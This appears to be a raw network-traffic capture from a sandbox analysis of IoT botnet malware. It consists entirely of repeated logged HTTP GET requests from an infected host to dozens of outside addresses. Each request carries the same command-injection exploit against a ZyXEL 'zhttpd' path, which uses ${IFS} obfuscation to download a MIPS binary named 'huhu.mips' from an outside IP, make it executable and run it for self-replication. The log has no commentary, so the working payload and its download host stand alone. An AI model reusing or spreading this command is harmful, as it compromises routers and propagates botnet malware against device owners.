                                                Jan 29, 2024 07:08:06.710352898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9021192.168.2.234076046.22.136.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710390091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9022192.168.2.2346424130.123.107.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710427999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9023192.168.2.2342748132.99.143.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710472107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9024192.168.2.2340938218.165.208.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710500956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9025192.168.2.2339744204.5.183.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710525036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9026192.168.2.233567695.84.72.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710582972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9027192.168.2.2351662177.91.187.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710627079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9028192.168.2.2339534130.148.178.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710654020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9029192.168.2.2335460195.149.93.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710711956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9030192.168.2.2351348203.68.211.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710741997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9031192.168.2.2351858218.230.221.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710788012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9032192.168.2.2348248112.231.233.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710832119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9033192.168.2.2359308133.177.19.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710865974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9034192.168.2.2350006209.45.222.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710923910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9035192.168.2.2346248173.39.198.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710969925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9036192.168.2.2349094188.24.16.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711004019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9037192.168.2.234369867.55.104.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711059093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9038192.168.2.234812263.176.242.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711101055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9039192.168.2.235703619.183.167.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711121082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9040192.168.2.234612653.155.253.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711195946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9041192.168.2.233349871.52.228.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711235046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9042192.168.2.2341692132.127.107.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711251974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9043192.168.2.2345514146.98.171.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711312056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9044192.168.2.2360460107.131.247.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711344957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9045192.168.2.2334128118.194.157.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711380005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9046192.168.2.23350602.44.212.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711429119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9047192.168.2.2334488126.126.140.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711478949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9048192.168.2.234559218.82.22.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711517096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9049192.168.2.2335846202.21.88.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711543083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9050192.168.2.235853020.63.253.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711584091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9051192.168.2.2356158179.136.234.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711632967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9052192.168.2.2336102189.245.104.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711680889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9053192.168.2.233490877.47.40.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711726904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9054192.168.2.233892063.80.233.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711775064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9055192.168.2.2335608188.187.25.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711812973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9056192.168.2.2348106206.184.134.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711853981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9057192.168.2.233494252.75.87.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711905956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9058192.168.2.2341244201.25.103.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711942911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9059192.168.2.233718689.51.129.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.711982965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9060192.168.2.2344728198.103.168.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712014914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9061192.168.2.234995668.202.3.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712065935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9062192.168.2.235662081.98.250.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712111950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9063192.168.2.2350112141.209.210.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712142944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9064192.168.2.2360172189.156.216.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712198973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9065192.168.2.2355866158.69.74.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712239981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9066192.168.2.2354026114.195.51.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712281942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9067192.168.2.2337772221.6.178.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712321997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9068192.168.2.2333864146.68.2.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712347984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9069192.168.2.235118079.197.93.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712405920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9070192.168.2.2357980203.51.69.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712430000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9071192.168.2.233864284.54.156.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712475061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9072192.168.2.23387001.14.75.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712518930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9073192.168.2.235091669.168.214.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712546110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9074192.168.2.2351066134.38.202.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712583065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9075192.168.2.2338044203.166.81.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712614059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9076192.168.2.2343586173.9.127.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712650061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9077192.168.2.235687045.119.47.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712691069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9078192.168.2.236080446.253.6.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712744951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9079192.168.2.2352786200.197.75.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712766886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9080192.168.2.235722284.151.108.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712802887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9081192.168.2.235468043.4.172.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712826967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9082192.168.2.233302649.105.251.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712877989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9083192.168.2.233832413.174.254.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712908983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9084192.168.2.235185299.140.32.10443
                                                TimestampBytes transferredDirectionData
